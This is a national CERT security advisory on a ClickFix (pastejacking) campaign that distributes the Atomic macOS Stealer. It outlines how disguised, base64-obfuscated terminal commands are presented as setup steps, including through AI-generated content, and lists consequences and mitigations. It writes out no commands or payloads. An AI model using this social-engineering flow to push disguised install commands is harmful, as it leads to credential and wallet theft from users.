ngCERT SECURITY ADVISORY ON CLICKFIX (PASTEJACKING) CAMPAIGN DISTRIBUTING ATOMIC macOS STEALER (AMOS)

Advisory ID:   ngCERT-2026-040001

SUMMARY

ngCERT is aware of an ongoing ClickFix (pastejacking) campaign targeting developers and users of AI tools. The campaign distributes Atomic macOS Stealer (AMOS), a sophisticated information-stealing malware affecting macOS systems. The attack leverages social engineering techniques to trick users into executing malicious terminal commands. Organisations and individuals are strongly advised to exercise caution and implement appropriate security controls.

DESCRIPTION

ClickFix (pastejacking) is a social engineering technique that manipulates users into copying and executing malicious commands from deceptive sources such as fake documentation pages, malicious advertisements, or AI-generated content. In this campaign, attackers disguise harmful terminal commands, often obfuscating them with encoding techniques such as base64, as legitimate setup or troubleshooting instructions. Once executed, these commands download and install AMOS. The malware establishes persistence on the compromised system, harvests sensitive information (including credentials and files), and may deploy additional backdoors to enable persistent remote access.

Damage:      Critical

Probability:  High

Platform(s):  macOS

CONSEQUENCES

If successfully exploited, this campaign may result in:

1. Credential theft, including browser-stored passwords and Apple Keychain data.
2. Unauthorized remote access through backdoor mechanisms.
3. Data exfiltration, including sensitive files and developer assets.
4. Compromise of cryptocurrency wallets and financial information.
5. Deployment of additional malware and further system exploitation.
6. Organisational risks such as supply chain compromise and credential leakage. 

SOLUTION/MITIGATION

ngCERT recommends the following:

1. Avoid executing terminal commands from untrusted sources, including advertisements, unknown websites, or unverified AI-generated content
2. Verify all documentation and instructions, ensuring they originate from official vendor domains
3. Educate users and developers on pastejacking techniques and social engineering risks
4. Deploy Endpoint Detection and Response (EDR) solutions to monitor suspicious shell activity
5. Restrict and monitor script execution on macOS systems
6. Enable and maintain built-in protections such as Gatekeeper and XProtect
7. Regularly update macOS and security tools to detect emerging threats
8. Monitor for unusual outbound network traffic and unauthorized persistence mechanisms
9. Implement least-privilege access controls to limit the impact of compromised accounts

HYPERLINK

• https://www.sophos.com/en-us/blog/evil-evolution-clickfix-and-macos-infostealers
• https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/
• https://smechannels.com/kaspersky-discovers-infostealers-mimicking-claude-code-openclaw-and-other-ai-developer-tools/